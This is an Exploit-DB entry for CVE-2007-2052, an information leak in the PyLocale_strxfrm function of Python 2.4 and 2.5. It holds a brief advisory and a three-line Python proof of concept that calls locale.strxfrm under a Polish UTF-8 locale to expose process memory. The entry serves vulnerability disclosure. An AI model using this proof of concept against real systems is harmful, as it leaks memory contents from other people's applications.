Python 2.5 PyLocale_strxfrm Function Remote Information Leak Vulnerability

2007-05-08T00:00:00
ID EDB-ID:30018
Type exploitdb
Reporter Piotr Engelking
Modified 2007-05-08T00:00:00

Description

Python 2.5 PyLocale_strxfrm Function Remote Information Leak Vulnerability. CVE-2007-2052 . Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/23887/info

Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak.

Exploiting this issue allows remote attackers to read portions of memory.

Python 2.4.4-2 and 2.5 are confirmed vulnerable. 

#!/usr/bin/python

import locale

print locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF8')
print repr(locale.strxfrm('a'))